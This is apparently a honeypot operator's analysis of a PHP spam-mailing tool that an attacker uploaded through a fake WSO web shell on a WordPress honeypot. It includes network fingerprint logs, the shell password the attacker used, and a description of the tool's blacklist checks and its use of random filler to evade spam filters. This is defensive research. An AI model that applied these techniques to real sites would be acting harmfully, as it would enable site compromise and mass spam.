Email spamming tool.
188.40.81.84 => static.84.81.40.188.clients.your-server.de
An IP address from AS24940, Hetzner Online, Datacenter 10
traceroute shows a route going into
hetzner.interxionfra4.nl-ix.net
and then core21.fsn1.hetzner.com, so the whois and DNS
lookup seem believeable.
[2017/12/08 06:00:07] mod=syn|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=12|params=none|raw_sig=4:116+12:0:1306:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
[2017/12/08 06:00:07] mod=mtu|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=cli|link=???|raw_mtu=1346
[2017/12/08 06:00:07] mod=syn+ack|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=srv|os=???|dist=0|params=none|raw_sig=4:64+0:0:1460:mss*20,7:mss,nop,nop,sok,nop,ws:df:0
[2017/12/08 06:00:07] mod=mtu|cli=188.40.81.84/62158|srv=162.246.45.144/80|subj=srv|link=Ethernet or modem|raw_mtu=1500
A Windows 7 or 8 machine. Interesting.
Download to a fake WSO web shell that is part of my WordPress honey pot.
Took advantage of WSO features by having the login pasword in a POST name/value pair, "[pass] => nhzgrf", along with the "Php" action, and the PHP source code to evaluate, which lets the downloader combine logging in with remote code execution.
cp 188.40.81.84WiqM2DM84DBGMCs7q5JorQAAAAU.php.file dc1.php- Hand edit
dc1.phpto remove goop, and verify it doesn't do bad things. php dc1.php, which yieldspromos.php
It looks like the code in dc1.php will echo something like:
p_url_to_check: http://compromised.host/directory/promos.php
This may be a way to communicate what URL to use to get at promos.php fabulous
functionality after it gets installed.
Invoked via HTTP POST.
Two main functions, "Check" (?ch=1) and "Send" (?sn=1).
The "Send" function looks like it can explode a single email
to many unwilling receipients. It looks like it can do attachments,
and maybe append randomized blobs of characters to attempt to fool spam filters.
It ultimately uses PHP's built-in mail() function.
The "Check" function can send test emails. It can check if the IP address of the compromised WordPress site appears in these email spam blacklists:
b.barracudacentral.org
xbl.spamhaus.org
sbl.spamhaus.org
zen.spamhaus.org
bl.spamcop.net